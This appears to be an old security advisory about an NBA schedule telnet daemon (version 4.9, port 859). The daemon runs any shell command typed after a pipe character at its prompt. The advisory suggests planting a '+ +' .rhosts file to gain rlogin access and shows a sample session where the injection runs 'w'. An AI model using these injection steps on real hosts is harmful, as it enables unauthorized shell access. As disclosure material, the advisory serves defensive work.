Systems with NBA 4.9
HD Moore found following. On Internet you may find a link to
telnet to a host on port 859, apparently a NBA (National
Basketball Association) telnet daemon for showing game schedules.
This program creates a major secuity hole on the machine it is
running. At login, you recieve a prompt that looks like <nba>, if
you type anything then the 'pipe' character "|" followed by a
shell comand, that command is executed. Doing this you could
create a .rhosts file containing the classic "+ +", then giving
shell access through rlogin. It is also possible to start lynx
(or some other program), then break out into a shell from that
usage: /usr/local/bin/nba [-vh] [-nNUM] [-HA] [-C] [-E[d|w]] [-U[d|w]]
[TEAM|DIV]] [mm/dd...]
With -v, print version information and exit.
This is version 4.9 for NBA 95-96.
With -h, print this help message and exit.
With no teams or divisions specified, print next NUM days (default=1) of
of league schedule from given date(s) (default is today if none given).
With one team or division, print next NUM games (default=3) for that team
or teams in that division.
With two teams or divisions, print games where first team (or team
in first division) plays second team (or team in second division).
-H or -A: Print only home or away games, for first team or division.
-C: Print monthly calendar format (specify month or default is current).
-E: Use European dates (dd/mm) and weeks (starting on Monday).
-U: Use U.S. dates (mm/dd) and weeks (starting on Sunday).
Teams can specified with or without leading -t, from the following
atl - Atlanta bos - Boston cha - Charlotte
chi - Chicago cle - Cleveland dal - Dallas
den - Denver det - Detroit gol - Golden State
hou - Houston ind - Indiana lac - LA Clippers
lal - LA Lakers mia - Miami mil - Milwaukee
min - Minnesota nj - New Jersey ny - New York
orl - Orlando phi - Philadelphia pho - Phoenix
por - Portland sac - Sacramento san - San Antonio
sea - Seattle tor - Toronto uta - Utah
van - Vancouver was - Washington
Divisions can specified with or without a leading -d, from the
following list:
pac - Pacific mid - Midwest ctl - Central
atc - Atlantic
The season runs from 11/3 to 4/21.
<nba> -V | w
/usr/local/bin/nba: unknown team or division code: -V
18:00 up 18 days, 14:14, 3 users, load average: 0.29, 0.96, 0.94
User tty from login@ idle JCPU PCPU what
xxxxxx p6 lichen 13:17 3days -ksh
xxxxxx p0 zlin 14:25 5days -tcsh
xxxxxx p7 petrie 15:13 2days 24:46 14 -csh
<nba> blah | lynx
Nothing yet that to remove this program.